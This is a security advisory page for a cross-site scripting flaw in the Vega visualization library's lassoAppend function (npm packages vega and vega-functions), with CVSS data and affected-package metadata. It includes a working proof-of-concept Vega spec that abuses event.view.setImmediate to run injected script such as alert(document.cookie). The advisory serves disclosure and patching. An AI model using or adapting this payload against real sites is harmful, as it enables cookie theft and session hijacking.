GHSA-w5m3-xh75-mp55
Suggest an improvement- Source
- https://github.com/advisories/GHSA-w5m3-xh75-mp55
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-w5m3-xh75-mp55/GHSA-w5m3-xh75-mp55.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-w5m3-xh75-mp55
- Aliases
- Related
- Published
- 2023-03-02T23:08:21Z
- Modified
- 2023-11-01T05:01:32.693589Z
- Severity
-
- 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
- Summary
- Vega has Cross-site Scripting vulnerability in `lassoAppend` function
- Details
-
Summary
Vega's
lassoAppendfunction:lassoAppendaccepts 3 arguments and internally invokespushfunction on the 1st argument specifying array consisting of 2nd and 3rd arguments aspushcall argument. The type of the 1st argument is supposed to be an array, but it's not enforced.This makes it possible to specify any object with a
pushfunction as the 1st argument,pushfunction can be set to any function that can be access viaevent.view(no all such functions can be exploited due to invalid context or signature, but some can, e.g.console.log).Details
The issue is that
lassoAppenddoesn't enforce proper types of its arguments:..... export function lassoAppend(lasso, x, y, minDist = 5) { const last = lasso[lasso.length - 1]; // Add point to lasso if distance to last point exceed minDist or its the first point if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) { lasso.push([x, y]); .....PoC
Use the following Vega snippet (depends on browser's non-built-in
event.view.setImmediatefunction, feel free to replace withevent.view.console.logor alike and observe the result in the browser's console){ "$schema": "https://vega.github.io/schema/vega/v5.json", "width": 350, "height": 350, "autosize": "none", "description": "Toggle Button", "signals": [ { "name": "toggle", "value": false, "on": [ { "events": {"type": "click", "markname": "circle"}, "update": "toggle ? false : true" } ] }, { "name": "addFilter", "on": [ { "events": {"type": "mousemove", "source": "window"}, "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')" } ] } ], "marks": [ { "name": "circle", "type": "symbol", "zindex": 1, "encode": { "enter": { "y": {"signal": "height/2"}, "angle": {"value": 0}, "size": {"value": 400}, "shape": {"value": "circle"}, "fill": {"value": "white"}, "stroke": {"value": "white"}, "strokeWidth": {"value": 2}, "cursor": {"value": "pointer"}, "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"} }, "update": {"x": {"signal": "toggle === true ? 190 : 165"}} } }, { "name": "rectangle", "type": "rect", "zindex": 0, "encode": { "enter": { "x": {"value": 152}, "y": {"value": 162.5}, "width": {"value": 50}, "height": {"value": 25}, "cornerRadius": {"value": 20} }, "update": { "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"} } } } ] }Impact
This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS
setImmediatepolyfill basically allowseval-like functionality). - Database specific
{ "nvd_published_at": "2023-03-04T00:15:00Z", "github_reviewed_at": "2023-03-02T23:08:21Z", "severity": "MODERATE", "github_reviewed": true, "cwe_ids": [ "CWE-79" ] }- References
Affected packages
npm / vega
Package
- Name
- vega
- View open source insights on deps.dev
- Purl
- pkg:npm/vega
npm / vega-functions
Package
- Name
- vega-functions
- View open source insights on deps.dev
- Purl
- pkg:npm/vega-functions